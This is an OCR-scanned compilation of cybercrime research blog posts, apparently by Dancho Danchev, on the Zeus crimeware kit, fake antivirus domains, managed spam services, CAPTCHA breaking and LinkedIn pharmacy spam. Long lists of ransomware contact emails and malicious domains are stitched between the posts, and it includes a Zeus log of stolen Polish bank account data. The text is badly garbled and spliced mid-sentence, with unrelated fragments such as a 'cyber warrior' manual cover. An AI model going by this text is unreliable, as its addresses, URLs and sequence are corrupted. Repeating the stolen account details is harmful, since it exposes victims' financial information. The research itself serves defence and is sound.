20.mia.kokers@aol.com 
gpcode@mail2tor.com 
directreserve@airmail.cc 
_hairullah@inbox.|v 
id-0123456789 _hairullah@inbox.|v 
ways.hairullah@inbox.Iv 
20.help24decrypt@qq.com 
ways.Helpme@freespeechmail.org 
stevegabriel2000@gmail.com 
invitations@twitter.com 
ransom@mail2tor.com 
-johnycryptor@aol.com 
superfabianwosar@mail.ru 
mstr.hack@protonmail.com 
datareturn@protonmail.com 
thewebcrawler77@gmail.com 
spare322@protonmail.ch 
DharmaBarrack@protonmail.com 
help.apple@gmail.com 
Hamlampampom@cock.|i 
hamlamampom@cock.li 
galgalgalhalk@tuta.io 
cremreihanob1979@yandex.ru 
redtablet@yahoo.com 
suppdecrypt@protonmail.com 
20Meldonii@india.com 
ways.Meldonii@india.com 
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CompID évm_fros_O7a5ScOal 


IP 192,168,.1,10 

Country os 

Report time 13:11:12 24,09,2008 

Version/Botmet 0,255,255, 255/tst 

System time 10:10:09 24,09,2008, GMT +7:00 

Login time 45:46:19 

Windows version 5,1, build 2600, service pack 3 

Language 1033 

Process C:\Program Files\Internet Explorer\IEXPLORE, EXE 


Grabbed data from: https://www.ipko.plfikd 


&nbsp &nbsp 


Urnowa do rachunku prywatnego 78 1020 1127 0000 1802 0055 3339 
Rachunki ROR 

_trodki dostLipne: 738,03 PLN 

Saldo: -6 821,97 PLN 

Urmowa do rachunku firrmowego 04 1020 1127 0000 1902 0113 1093 
Rachunki bielJll Ice 

_lrodki dost_ipne: 46 992,68 PLN 

Saldo: 46 992,68 PLN 


Podsumowanie 
_trodki dostlipne: 47 070,71 PLN 
Saldo: 40 170,71 PLN 


For the time being, the innovation or user-friendly features boosting the popularity of Zeus 
come from the third-party coders improving the original Zeus release. Moreover, not only 
are they improving it, [5]they’re also looking for vulnerabilities within the different releases, 
and actually finding some. What does this mean? It means that we have clear evidence of 
crimeware monoculture, with a single kit maintaining the largest market share. 


With the cybercrime ecosystem clearly embracing the outsourcing concept for a while, it 
shouldn’t come as a Surprise, that [6]botnets running the Zeus crimeware are offered for rent 
at such cheap rates that purchasing the kit and putting efforts into aggregating the botnet may 
seem a pointless endeavor in the eyes of a prospective cybercriminal, even an experienced 
one interested in milking inexperienced cybercriminals not knowing the real value of what 
they’re doing. 


Moreover, speaking of monetization, the attached screenshots represent a very decent 
example of monetizing the reconaissance process of E-banking authentication that cyber- 
criminals or vendors of crimeware services undertake in order to come up with the modules 
targeting the financial institutions of a particular country. Is this monetization just "mone- 
tization of what used to be a commodity good/service" as usual taking into consideration 
this overall trend, or perhaps there’s another reason for monetizing snapshots of E-banking 
authentication activities in order to later on achieve efficiency in the process of abusing 
them? But of course there is, and in that case it’s the fact that no matter that a potential 
cybercriminal has obtained access to a crimeware kit, its database of injects is outdated and 
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ways.Melme@india.com 
nydataback@aol.com 
unlockandrecover@pm.me 
ttk@ruggedinbox.com 
imaje.jpg.nefartanulo@protonmail.com 
h12345h@sigaint.org 
newrar@protonmail.com 
20ninja.gaiver@aol.com 
d_wilk@cox.net 
geekhaxid@gmail.com 
rstyle@kaliningrad.ru 

die _yourself@protonmail.com 
ocean-1955@india.com 
200cean-1955@india.com 
oled@airmail.cc 
spaghetih@protonmail.com 
partydog@onionmail.org 
buhtrap@aol.com 
payday-1838@protonmail.com 
Document.txt.id-1923528234023-paycrypt@aol.com 
perfection@bestkoronavirus.com 
3nigma@O.pl 
shivamana@seznam.cz 
WillardBrooks6499@gmail.com 
protonmolecule@gmx.us 
yourmom@yahoo.com 
devon@da532.com 
Cryptowarel2@protonmail.com 
raphaeldupoun@aol.com 
helpdecrypt@cock.li 
freelurk@aol.com 
Realxakepok@bigmir.net 
Recuperaddados@protonmail.com 
20Recuperadados@protonmail.com 


redshitline@aol.com 
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20redshitline@india.com 
ways.Redshitline@india.com 
unrasom@me.com 

ways.Repair data@cryptmail.com 
baron38@webmeetme.com 
elizabeth7@protonmail.com 
likbez77777@gmail.com 
rumblecrypt@rediffmail.com 
otostehos1970@protonmail.com 
ibfosontsing@protonmail.com 
ibfosontsing@tutanota.com 
mahammad@opensourcemail.org 
Ynhf4rfekwcL.fastsupport@xmpp.jp 
hautdebit@freetelecom.fr 
Compton.85085@daankromhout.nl 
crimecrypt@airmail.cc 
meldung@bsi-bund.org 

20Space __rangers@aol.com 
ways.Space _rangers@aol.com 
20Ssimpotashka@gmail.com 
ways.Ssimpotashka@gmail.com 
rikeistner@gmail.com 
suppteam01@yandex.ru 
Suppteam02@india.com 
Suppteam02@yandex.ru 
ways.Suppteam01@india.com 
s1m4@protonmail.ch 
temloown@gmail.com 
ransomedia@india.com 
otrazhenie _zla@mail.ru 
post77999@gmail.com 
post7799@yahoo.com 
DamianO1lsonsnowdrop@cock.|i 
ultracode@tormail.org 
undblocked@tuta.io 
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ways.unblocked@email.su 
tety86@cock.li 
Vipasana4@aol.com 
johnmen.24@aol.com 
crypt@india.com 
hairullah@mail.bg 

emaill sos@decryptfiles.com 
email2 _zuza@protonmail.com 
filel@openmailbox.org 
file2backup@inbox.Iv 
wtfsupport@cock.li 
20wtfsupport@airmail.cc 
ways.wtfsupport@airmail.cc 
xcsset@aol.com 
BaYiCheng@yeah.net 
protonis@gmx.com 
yamistinks@gmail.com 


20Yourencrypter@protonmail.ch 


ways.Yourencrypter@protonmail.ch 


zeta@dr.com 

zeta@oath.com 
pabluk700@protonmail.ch 
help2015@scryptmail.com 
backdatal@cock.li 
helpmedecoding@airmail.cc 
cnietogomez@hotmail.com 
sjen6293@gmail.com 
wangteam888@tutanota.com 
unlockmeplease@protonmail.com 
unlockmeplease@airmail.cc 
112@aol.com 
hepll112@aol.com 
tzk7@protonmail.ch 
Sidmouleux996@yahoo.com 


Sidmouleux996@protonmail.com 
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ways.Savepanda@india.com 
hblackhat@mail.ru 
fbifine@protonmail.com 
customersupport@polarity.com.cy 
serpom@protonmail.com 
cryptom73@yandex.com 
20sherminator.help@tutanota.com 
ways.Sherminator.help@tutanota.com 
DineshSchwartz1965@pratonmail.com 
20.siliconegun@tutanota.com 
ways.Sitaram108@india.com 
MasterFile001@protonmail.com 
hackwand@protonmail.com 

stn satan@aol.com 
SantaGman@protonmail.com 
SantaGman@tutanota.com 
SummonunLock@gmail.com 
helen@Lnxnc.com 
20.supportfiless24@protonmail.ch 
teamv@protonmail.com 
xRatTleam@mail2tor.com 
torsed@protonmail.ch 
clevercrypt@aol.com 
PauRyan@trobibtc.us 
name.safefiles32@mail.ru 
name.filesdecrypt@india.com 
yourboss@ifirepeopleforfun.com 
test@gmail.com 
helpUdjvu@india.com 
smtrx911@keemail.me 
idunn0@abv.bg 
muracami@mail.fr 

vassago 0203@tutanota.com 
locksvbox@protonmail.com 
venomous.files@tutanota.com 
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quacksalver@onionmail.org 
quacksalver@msgsafe.io 
20VeraCrypt@india.com 
l.archibald.68@chewiemail.com 
daniel _arnold61@powdermail.com 
vulicapson@cock.lu 
vulicapson@tuta.io 
ransomsample@outlook.com 
20.wewillhelp@airmail.cc 
htaccess12@gmail.com 
phedoc@who.int 

name@who. int 
0952D66CC63F1D353F45C0535AB16C7C@tor2mail.co 
wormlocker789@gmail.com 
u201cbahij2@india.com 

nClay _whoami _1@protonmail.ch 
nudachal23yes@mail2tor.com 
ndeltapaymentbitcoin@gmail.com 
nretrievedata300@gmail.com 
nninja.gaiver@aol.com 
nsupport.3330@gmail.com 
ransomwarel0@yahoo.com 
-ransomwarel0@yahoo.com 
ndecode@india.com 
nhairullah@inbox.|v 
nhairullah@mail.bg 

nemaill sos@decryptfiles.com 
nemail2 _zuza@protonmail.com 
nfilel@openmailbox.org 
nfile2@openmailbox.org 
nfile2backup@inbox.|v 
nhelpme@freespeechmail.org 
nsilasw9pa@yahoo.co.uk 
nmvplocksvc@yahoo.com 


nFireFoxPlugin@get-a-clip.com 
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nredshitline@india.com 
u201cix@hotmail.com 
nVipasana4@aol.com 
ntrueransom@mail2tor.com 
u2018dopomoga.rs@gmail.com 
n7399@sigaint.org 
nJjohnyCryptor@aol.com 
nJjohnyCryptor@india.com 
nsub _zerol12@aol.com 
ngerkaman@aol.com 
nfreetibet@india.com 
ncyber baba2@aol.com 
nsiddhiup2@india.com 
ngruzinrussian@aol.com 
nramachandra7@india.com 
ngoldman0@india.com 
ncenturion legion@aol.com 
ndalailama2015@protonmail.ch 
nVegclass@aol.com 

na _princ@aol.com 
nmilarepa.lotos@aol.com 
nEcovector3@aol.com 

nEco vector@aol.com 
nDr.jimbo@bk.ru 
nKozy.jozy@yahoo.com 
nkratosdimetrici@gmail.com 
nabramova@sabona.ru 
nkirova.ls@orangedv.tmweb.ru 
nkirova-l@wibor5.ru 

nl _abramova@wibor5.ru 
nabramova.|@wibor5.ru 
ny.volkova@i-jazz.ru 

nl _abramova@festivalps.ru 
nfudx@lycos.com 


nhelprecover@ghostmail.com 
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ndrugvokrug/727@india.com 
nMasterlock@india.com 
nFlyper01@sigaint.org 
ndecryptme.files@mail.ru 
neuropol.eurofuck@yandex.com 
nsuper.decryptme2016@yandex.com 
nefwerez2015@yandex.com 
nrealfsOciety@sigaint.org 
nTelegram@comodosecurity.com 
nVenisRansom@protonmail.com 
u201csupport.code@aol.com 
nparisher@inbox.|v 
ninfomacaonh@gmail.com 
nzikr@protonmail.com 
nzikra@protonmail.com 
nzikr@usa.com 
nSanta-helper@protonmail.com 
nlavandos@dr.com 
nlavandos@india.com 
namagnus@india.com 
nbitcoinl143@india.com 
nRestoreFile@yahoo.com 
nRestoreFile2018@gmail.com 
nsuplO@post.com 
nsup|O@oath.com 
nmgfakhri@gmail.com 
njschweiz@protonmail.ch 
u81f3lambdasquad.hl@yandex.com 
nransom@mail2tor.com 
nzipper@email.tg 
naes-ni@protonmail.com 
naes-ni@tuta.io 
nestion@sigaint.org 
nmyqjsO1l1@gmail.com 
nolvl100@maail.ru 
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nvegeta85@safe-mail.net 
nPab.luk500@gmail.com 
nBM-2cWSRwwinrcLGFITNF5RxiwR8hW5jikS1m@bitmessage.ch 
nviastnou.hlavou@mailfence.com 
nprOtector@india.com 
nprOtector@tutanota.com 
ngeekhax@amail.com 
nalka@protonmail.com 
n0xc030@protonmail.ch 
nsteverusell@mail.com 
nblack-rose@outlook.co.th 
n0xc030@tuta.io 
naes-ni@scryptmail.com 
nTizer78224@gmx.de 
nTizer78224@india.com 
nTizer77234@protonmail.com 
nFilegorillal388@india.com 
nFilegorillal388@protonmail.com 
nPec.clean@protonmail.com 
nbeqins@colocasia.org 
nbilbo@colocasia.org 
nfrodo@colocasia.org 
ntrevor@thwonderfulday.com 
nbob@thwonderfulday.com 
nbil@thwonderfulday.com 
ndata0001@tuta.io 
nunhappymalware@protonmail.com 
natlantis.cf@yandex.com 
natlantis _cf@protonmail.com 
nwebmafia@asia.com 
ndonald@trampo. info 
nExtel@msgden.net 
nExte2@protonmail.com 
nExte3@reddithub.com 


nblackoutsupport@mail2tor.com 
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nforbiddenmr403@gmail.com 
nmr403forbidden@hotmail.com 
nunlckr@protonmail.com 
tabc@xyz.com 

tacc@xyz.com 
nfbifine@protonmail.com 


nsupport@polarity.com.cy 


ncustomersupport@polarity.com.cy 


nmortalis certamen@aol.com 
nerrorOl@msgden.com 
nerrorO2@webmeetme.com 
nerrorO3@protonmail.com 
nempty01@techmail.info 
nEmpty02@yahooweb.co 
nEmpty003@protonmail.com 
nigor.glushkov.83@mail.ru 
nConftcker-decryptor@mail.ru 
ngetyourfilles@bigmir.net 
ngetyourfilles@india.com 
nrestoreassistant2@tutanota.com 
nx1881@tuta.io 
nx1883@yandex.com 
nx1881@protonmail.com 
nx1884@yandex.com 
ndd.coala@protonmail.com 
nransomed@india.com 
nrelock001@tuta.io 
nrelockO0l@yahoo.com 
nlordashadow@gmail.com 
ny0000@tuta.io 
nyO0000@protonmail.com 
nyO0O00@yandex.com 
nmaxicrypt@cock.li 
nunlockforyou@india.com 


nfileskey@qq.com 
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nsupport@fbamasters.com 
nfrenkmoddy@tuta.io 
nfileskey@cock.li 

files. restore@aol.com 
nhappyness@keemail.me 
nmessenger@riseup.net 
nsuspendedfiles@bitmessage.ch 
nsuspendedfiles@india.com 
nAhmad26@2336.com 
nAileen65@9033.com 
nBeulah34@1490.com 
nBilly20@4425.com 
nBilly11@4302.com 
nBlaine98@8771.com 
nDeanna62@5595.com 
nGlenna52@2606.com 
nTara72@1753.com 
nTheZenis@Tutanota.com 
nTheZems@MailFence.com 
nTheZenis@Protonmail.com 
nTheZenis@Mail2Tor.com 
ncrypto7892@gmx.de 
ncrypto7892@protonmail.com 
nMastersRecovery@protonmail.com 
nvahidkhazl23@qmail.com 
ndie _yourself@protonmail.com 
nsynack@countermail.com 
nJohnnieWalker@firemail.cc 
nsigrun _decryptor@protonmail.ch 
nBackuppc@protonmail.com 
nBackuppc1@protonmail.com 
nBackuppc@yandex.com 
nBackuppc@dr.com 
ndecryption@bitmessage.ch 
ndecryption@india.com 
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therefore a new one has to be either built or purchased. 


With Adrenalin now leaked to the general script kiddies and wannabe cybercriminals, it’s 
only a matter of time until a community is build around it, one that would inevitably increase 
is popularity and prompt others to introduce new features within the kit. 


Related posts: 

[7]Targeted Spamming of Bankers Malware 
[8]Localized Bankers Malware Campaign 
[9]Client Application for Secure E-banking? 
[10]Defeating Virtual Keyboards 
[11]PayPal’s Security Key 


ttp://ddanchev. blogspot .com/2008/04/crimeware-in-middle-zeus. htm 


ttp://ddanchev .blogspot.com/2008/09/modified-zeus-crimeware-kit-comes-with.htm 


ttp://ddanchev.blogspot.com/2008/11/modified-zeus-crimeware-kit-gets.htm 


ttp://ddanchev. blogspot .com/2008/11/zeus-crimeware-kit-gets-carding-layout .htm 


_ tip: //adanchor blogapotcon/2008/12/zous~crinovare-as-service-going. bial 
| http://adanchey blogspot con/2007/11/targeted- spaming-of-bankers-nalvare tal 
_ http: //adanchev blogspot. con/2008/09/local ized-bankere-nalvare-caapaign. ita 
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ttp://ddanchev.blogspot.com/2007/05/client-application-for-secure-e-banking. htm 


10. http://ddanchev. blogspot .com/2007/05/defeating-virtual-keyboards.htm 
11. http://ddanchev. blogspot .com/2007/08/paypals-security-key.htm 
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ninfovip@airmail.cc 
tfastrecovery@airmail.cc 
nfastrecovery@airmail.cc 
nfastsupport@xmpp.jp 
noktropys@protonmail.com 
njOra@protonmail.com 
nBM-2cTzz6rwtd8d7qd1wVegH6sZ44GbNPV8Li@bitmessage.ch 
u201c24H@tutanota.com 
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nsavefiles@india.com 
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ncrab7765@protonmail.com 
ninkognitoman@tutamail.com 
ninkognitoman@firemail.cc 
ndecriptscrabber@mail.ru 
ntrinskert@bk.ru 
ndecoder-help@protonmail.com 
npetropasevich@aol.com 
u043aocode@gmail.com 
naperfectday2018@protonmail.com 
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nfilekerk@tutanota.com 
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nenter software@aol.com 
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u2028helpshadow@india.com 
u2028helpshadow@firemail.cc 
nhelpUdjvu@india.com 
nhelpdjvu@firemail.cc 
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u00a0artilkilin@tuta.io 
u00a0ssananunak1987 @torbox3uiot6wchz.onion 
ndecryptOr-help@protonmail.com 
nhelpdjvu@india.com 
nanatova2@tutanota.com 
nanatoday@tutanota.com 
nhealforyou@cock.li 
ncrab1917@gmx.de 
ncrab1917@protonmail.com 
ndesync@airmail.cc 
nrtddecrypt@airmail.cc 
nCottleAkela@protonmail.com 
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nreverso@cock.li 
ntyrkinovusr@tutanota.com 
nunlock@graylegion.su 
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nxxback@keemail.me 
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nmetanl19@mail2tor.com 
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nrecoverydata@india.com 
nRobSmithMba@protonmail.com 
nsupport@robsmithmba.com 
xlsx@protonmail.com 
nbivisfiles@protonmail.com 
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21025 


Spyware Guard 200 


Wome Download Help Contacts 


@) What is Spyware: ®) What is Spyware Guard: 


Soyware ts computer sc@ware Mist ts instated Spyware Guard 2009 5 a bghtweight tool providing pour 
SuTeseBously on a personal computer to witercept or PC's uBrnate sstety i e tingle Ck Resigental scanner 
tae parbal Como! over Me user's interacton wih He @asity SCANS efter Complete PC or needed folders and 
computer, wihot he users informed consert TEMOVES UNWaMted EOyware. Malware and even viruses: 
Nowadays soyware ts externty Narrrts arrd realty One of he stompest sotuton in Ne Mossy Spyware Guard 
dangerous ves pou best to protect your data - now and today’ 


&9 Basic functions: Run FREE spyware scan 


@ PertectFit hewistic technology, automaticaly detecting To remove af the spyware from your PC 
all the spyware, malware and viruses on your PC and you can run easy, safe and absolsely 
Geleting it free spyware scan 


a Un que user interface, providing you with all basic You't be redrected to Gowrload page, where 
functions fromn a single tab: pretty and smarty you Can get special edition of are Guard 
which functionalty is trited to scanning 
M@ SmartScan technology, giving you ability to scan either 
the whole drive or common foklers if you need instant and actve protecton, purchase 
Spyware Guard 2009 for $49.95 (single toense) 
“Additional mode for spyware detection, protecting your only 
PC even when active protection is tumed off 


@ westant vieus and Spyware signature update and support » | 
via website or E-mail ® Start scan 


Home | Download | Help | Contacts Legal | Privacy Policy | Refund Policy | Terms of Serwce 
< me 


Descriptive fake security software domains speak for themselves, and what follows are the 
very latest ones currently active in the wild : 


spywareguard2009m .com (78.26.179.253; 94.247.2.39) 
systemguard2009m .com 

spywareguard2009 .com 

systemguard2009 .com 

getsysgd09 .com 


Registrant : Damir Sbil; Email: damirsbils791@googlemail.com 


antispyscanner13 .com (94.247.2.39; 78.26.179.253) 
sgproductm .com 

sgviralscan .com 

sgl10scanner .com 

sgliscanner .com 

sgl2scanner .com 

sg9scanner .com 

sgproduct .com 


Registrant: Ahmo Stolica; Email: ahmostolIn73@yahoo.com 
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Sorewe 
vrs 
vrus 
vrs 
Serrmare 
Serrmare 
vrus 


@ Warning!!! 364 infected files found 
Cit. the “Erase al throats” button to erase all spyware and viruses from Windows 


[2) Erase af threats 
—_—E 


A, Security errors detected x 


‘Click here to view errors iat. 
Remove thes errors a+ soon a possible Lo prevent 
Gata lost and privacy itfoemation exposure 


buysysantivirus2009 .com (94.247.2.75) 
sysav-download .com 
sysav-storage .com 
sysantivirus-check .com 
antispyware-pro-dl .com 
sysantivirus2009 .com 
sysav-download .com 
sysav-storage .com 
sysantivirus-check .com 
antispywarefastcheck .com 
antispyware-scanner-2009 .com 
antispyware-pro-dl .com 


Registrant: Dion Choiniere; Email: noelwollenberg@ymail.com 


premium-antivirus-defence.com (195.24.78.186) 
lite-antispyware-scan.com 
computeronlinescan.com 
lite-antispyware-scan.com 
liteantispywarescan.com 
liteantispywarescanner.com 
liteantispywareproscan.com 
onlineproantispywarescan.com 
bestantispywarescan.com 
bestantispywarelivescan.com 
antispywareliveproscan.com 
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antispywareinternetproscan.com 
bestanti-virusscan.com 
antimalware-scanner.com 
computerantivirusproscanner.com 
antimalwareproscanner.com 
antimalware-pro-scanner.com 
antimalware-scanner.com 
antimalware-scan.com 
computeronlineproscanner.com 


Registrant: Maksim Hirivskiy Email: 
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alt165@freebbmail.com 


AS3257 
TISCALI-BACKBONE 


’ oe BTG12-AS C—% 


DNS servers to keep an eye on, courtesy of UralComp-as Ural Industrial Company LTD 
(AS48511) : 
nsl.europegigabyte .com 
fastuploadserver .com 
nsl.managehostdns .com 
dns3.systempromns .com 
nsl.freehostns .com 
nsl.singatours .com 
ns1.airflysupport .com 
nsl.eguassembly .com 
ns1.fastfreetest .cn 


Proactively blocking these undermines a great deal of traffic acquisition campaigns whose aim 
is to hijack legitimate traffic to these domains. 
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[6]A Diverse Portfolio of Fake Security Software - Part Nine 
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[13]A Diverse Portfolio of Fake Security Software - Part Two 
[14]Diverse Portfolio of Fake Security Software 


. http: //ddanchev. blogspot .com/2009/01/diverse-portfolio-of-fake-security.htm 
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ttp://ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security_16.htm 


. http: //ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_30.htm 


. http: //ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_24.htm 
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ZNet 


Home News & Blogs Videos White Papers Downloads Reviews Popular 


Ryan Naraine, Dancho Danchev & Adam O'Donnell 
% Monte (sas MB imal Aliens ee 


Pick a blog Category bd | vee | 


ZDNet Must Read. 

Mac malware will become endemic amongst high- 

risk groups p< 

Adam ODonnel: Two Mac trojan cutbreaks were spotted m the past week CIO Sessions 
leaving several people, incuaing myself, to wonder le the tipgeng pore for ; 

the Mac malware epider has arrived. Corkrwe P Check out cur 
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The following is a brief summary of all of my posts at ZDNet’s [1]Zero Day for January. You can 
also go through previous summaries for [2]December, [3]November, [4]October, [5]Septem- 
ber, [6]August and [7]July, as well as subscribe to my [8]personal RSS feed or [9]Zero Day’s 
main feed. 


Notable articles for January include [10]Microsoft study debunks phishing profitability; 
[11]Legal concerns stop researchers from disrupting the Storm Worm botnet and [12]Google 
Video search results poisoned to serve malware. 


01. [13]Thousands of Israeli web sites under attack 

02. [14]Bogus LinkedIn profiles serving malware 

03. [15]Microsoft study debunks phishing profitability 

04. [16]Paris Hilton’s official web site serving malware 

05. [17]Malware author greets Microsoft’s Windows Defender team 
06. [18]3.5m hosts affected by the Conficker worm globally 

07. [19]GoDaddy hit by a DDoS attack 

08. [20]Legal concerns stop researchers from disrupting the Storm Worm botnet 
09. [21]Malware-infected WinRAR distributed through Google AdWords 
10. [22]New mobile malware silently transfers account credit 

11. [23]GPU-Accelerated Wi-Fi password cracking goes mainstream 
12. [24]Google Video search results poisoned to serve malware 
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. http: //blogs.zdnet .com/securit 


. http: //ddanchev. blogspot .com/2009/01/summarizing-zero-days-posts-for.htm 


. http: //ddanchev. blogspot .com/2008/12/summarizing-zero-days-posts-for.html 


. http: //ddanchev. blogspot .com/2008/11/summarizing-zero-days-posts-for-october.htm 


. http: //ddanchev. blogspot .com/2008/09/summarizing-zero-days-posts-for-august.htm 
. http: //ddanchev. blogspot .com/2008/08/summarizing-zero-days-posts-for-july.htm 


ttp://updates.zdnet.com/tags/dancho+danchev . htm1?t=0&s=0k0=1&mode=rss 


1 
2 
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4 
5. http: //ddanchev. blogspot .com/2008/10/summarizing-zero-days-posts-for.html 
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?p=2366 
11. http://blogs.zdnet .com/security/?p=2396 
12. 
13 
14. http://blogs.zdnet.com/security/?p=2358 
15. 
16 
17. http://blogs.zdnet.com/security/?p=238 
18 
19. 
20. http://blogs.zdnet .com/security/?p=2396 
2. 
22. 
23. http://blogs.zdnet .com/security/?p=2419 
24. http://blogs.zdnet .com/security/?p=243 


5.2.6 Quality Assurance in a Managed Spamming Service (2009-02-11 16:50) 


Following [l]previous coverage of the [2]managed spam services offered by [3]the Set-xX 
mail system and a [4]copycat variant of it, a newly introduced managed spam service is 
emphasizing on quality assurance through the use of a Google Search Appliance for storing of 
the harvested email databases and the spam templates. 
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Here’s an automatic translation of some of the key features offered by the system, cur- 
rently having a price tag of $1,200 per month: 


"A summary of the main possibilities of the system 

- Innovative technology deliver a unique e-mail system designed specifically for ******** 
to maximize serve up e-mails with a low rate of rejection-Kernel Multi-organization system 
provides extremely high speed while the low-platform-Provide complete sender’s anonymity 
at the maximum system performance in terms multi-technology operating system bypass 
content filters using the built-in special tags: 


+ Configurable generation of random strings 


+ Change the case of letters randomly in a block 

+ random permutation of symbols in the block 

+ Inserting a random character in an arbitrary place in the block 

+ Replacing the same style of letters Latin alphabet for the Russian block 

+ Duplicating a random character in the block 

+ Paste into the body of a random letter strings from a file 

+ Managed morfirovanie image files in the format GIF-Correct emulation header sent letters 
Simultaneous connection of several bases e-mail addresses of those letter-substitution is per- 
formed from file-substitution e-mail addresses for the fields From and Reply-To is performed 
from a file-format of outgoing messages TEXT and HTML 

+Ability to send emails from attachments 

+Correct work with images in HTML messages possible as a direct method and with copies of 
CC , BCC-record-keeping system, results of the system is stored in files good, bad and unlucky 
for each connection of e-mail addresses, respectively 

+The system is convenient and intuitive graphical user interface 


Sending to: 


rjs.sender@gmail.com 
= 2 


+ Cancer 
> are 


a" 


System management 

The system is operated under the interface to "Control Panel". The first is of them is multi- 
functional and serves to start the process of sending (the state of the "Run"), pause (the state 
of "pause") and confirm the end of the (state "Report") . The second button ("Stop") serves 
to interrupt the process otpravki. Data section also contains the following information fields: 

- executes an action in this field is carried out to date, the system-progress indicator graphic 
indication of progress the task, Completed Display task progress percentage 
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- Successful delivery of letters to the number of addresses that had been carried out success- 
fully, failure of the number of addresses that failed to deliver a letter-number bad non-existent 
addresses, duration of the actual time of the task-status displays the status of the kernel 
system kernel kernel memory Displays memory core systems" 


The ongoing arms race between the security industry and cybercriminals, is inevitably 
driving innovation at both sides of the front. However, based on the scalability of these man- 
aged spam services, it’s only a matter of time for the vendors to embrace simple penetration 
pricing strategies that would allow even the most price-conscious cybercriminals, or novice 
cybercriminals in general to take advantage of this standardized spamming approach. The 
disturbing part is that the innovation introduced on behalf of the soam vendors in terms of 
bypassing spam filters, seems to be introduced not on the basis of lower delivery rates, but 
due to the internal competition in the cybercrime ecosystem. 


For instance, new market entrants in the face of botnet masters attempting to monetize 
their botnets by offering the usual portfolio of cybercrime services, often undercut the 
offerings of the sophisticated managed spam vendors. And so the vendors innovate with 
Capabilities that the new market entrants cannot match, in order to not only preserve their 
current customers, but also, acquire new ones. Managed spam services as a business model 
is entirely driven by long term "bulk orders", compared to earning revenues on a volume basis 
by empowering low profile spammers with sophisticated delivery mechanisms. 


In the long term, just like every other segment within the cybercrime ecosystem, verti- 
cal integration and consolidation will continue taking place, and thankfully we’ll have a 
situation where the spam vendors would be sacrificing OPSEC (operational security) on their 
way to scale their business model and acquire more customers. 


http: //ddanchev. blogspot .com/2007/10/managed-spamming-appliances-future-of .htm 
ttp://ddanchev. blogspot .com/2008/07/dissecting-managed-spamming-service. htm 


1. 
2. 
3. http://blogs.zdnet .com/security/?p=1899 
4. 


http: //ddanchev. blogspot .com/2008/10/inside-managed-spam-service.htm 


5.2.7  Community-driven Revenue Sharing Scheme for CAPTCHA Breaking 
(2009-02-17 14:33) 
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What follows when a system that was originally created to be recognizable by humans only, 
gets undermined by low-waged humans or grassroots movements? Irony, with no chance of 
reincarnation. [L1]CAPTCHA is dead, humans killed it, not bots. 


A new market entrant into the [2]CAPTCHA-breaking economy, is proposing a novel ap- 
proach that is not only going to result in a more efficient human-based CAPTCHA solving on a 
large scale, but is also going to generate additional revenues for webmasters and their site’s 
community members. The concept is fairly simple, since it’s mimicking [3]reCAPTCHA’s core 
idea. 


However, instead of digitizing books, the CAPTCHA entry field that any webmaster of an 
underground community, or a general site in particular that would like to syndicate CAPTCHAs 
from Web 2.0 web properties is free to do so on a revenue-sharing, or plain simple voluntary 
basis. 
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Consider for a moment the implications if such a project of they manage to execute it 
successfully. Starting from community-driven CAPTCHA breaking of Web 2.0 sites on basic 
forum registration fields using MySpace.com’s CAPTCHA for authenticating new/old users, the 
plain simple automatic rotation for idle community users, to the enforcement of CAPTCHA 
authentication for each and every new forum post/reply. 


What happens with the successfully recognized CAPTCHAs? As usual, hundreds of thou- 
sands of bogus profiles will get automatically registered for the purpose of spam and malware 
spreading, or reselling purposes. The development of this service - if any - will be monitored 
and updates posted if it goes mainstream. 


Related posts: 

[4]The Unbreakable CAPTCHA 

[5]Spammers attacking Microsoft’s CAPTCHA - again 

[6]Spam coming from free email providers increasing 
[7]Gmail, Yahoo and Hotmail’s CAPTCHA broken by spammers 
[8]Microsoft’s CAPTCHA successfully broken 

[9]Vladuz’s Ebay CAPTCHA Populator 

[10]Spammers and Phishers Breaking CAPTCHAs 

[11]DIY CAPTCHA Breaking Service 

[12]Which CAPTCHA Do You Want to Decode Today? 


1. http: //blogs.zdnet .com/security/?p=183 
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. http://ddanchev. blogspot .com/2008/07/unbreakable-captcha.htm 
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10. http://ddanchev. blogspot .com/2007/09/spammers-and-phishers-breaking-captchas.html 
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5.2.8 Pharmaceutical Spammers Targeting LinkedIn (2009-02-18 18:22) 
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Following January’s [1]malware campaign relying on bogus LinkedIn profiles, this time it’s 
pharmaceutical spammers’ turn to target the [2]business-oriented social networking site. 


2117 


[17] 


21143 


21144 


A MANUAL BY DANCHO DANCHEV 


EXPOSING 


KGB Agents 


How many countries do you want to take offline 
today? 


Bringing Down Whole Nations and Entire Companies 


BECOMING A 
CYBER W ARRIOR 


Manual by Dancho Danchev 


[19] 
21145 


[20] 


21146 


[21] 


21147 


"SHALL WE TAKE YOU HIGHER" 


[22] 
21148 


[27] 


[28] 
21152 


From a spammers/blackhat SEO-er’s perspective, this is done for the purpose of increas- 
ing the page rank of their pharmaceutical domains based on the number of links coming from 
LinkedIn. The campaigns are monetized through the usual [3]affiliate based pharmaceutical 
networks. 


The following is a complete list of the currently active bogus domains, all part of identi- 
cal campaigns: 

linkedin .com/in/buyviagra45 

linkedin .com/in/phenterminetrueway 
linkedin .com/in/OnlineBuyProzac 
linkedin .com/in/CheapBuyGabapentin 
linkedin .com/in/BuyCheapTramadol 
linkedin .com/in/cheaptramadol 
linkedin .com/in/buybactrimonline 
linkedin .com/in/OnlineBuyAugmentin 
linkedin .com/in/OnlineBuyMetformin 
linkedin .com/in/OnlineBuyBiaxin 
linkedin .com/in/CheapBuyNorvasc 
linkedin .com/in/OrderBuyCelebrex 
linkedin .com/in/OnlineBuyLipitor 
linkedin .com/in/BuyCheapOxycontin 
linkedin .com/in/OnlineBuyHydrocodone 
linkedin .com/in/OrderBuyPercocet 
linkedin .com/in/OnlineBuyFioricet 
linkedin .com/in/OrderBuyKlonopin 
linkedin .com/in/OnlineBuyDiazepam 
linkedin .com/in/OnlineBuyXanax 
linkedin .com/in/CheapBuyOxycodone 
linkedin .com/in/OnlineBuyClonazepam 
linkedin .com/in/OnlineBuyEffexor 
linkedin .com/in/OnlineBuyAmbien 
linkedin .com/in/OnlineBuyAtivan 
linkedin .com/in/OnlineBuyVicodin 
linkedin .com/in/OnlineBuyNexium 
linkedin .com/in/OrderBuyCipro 
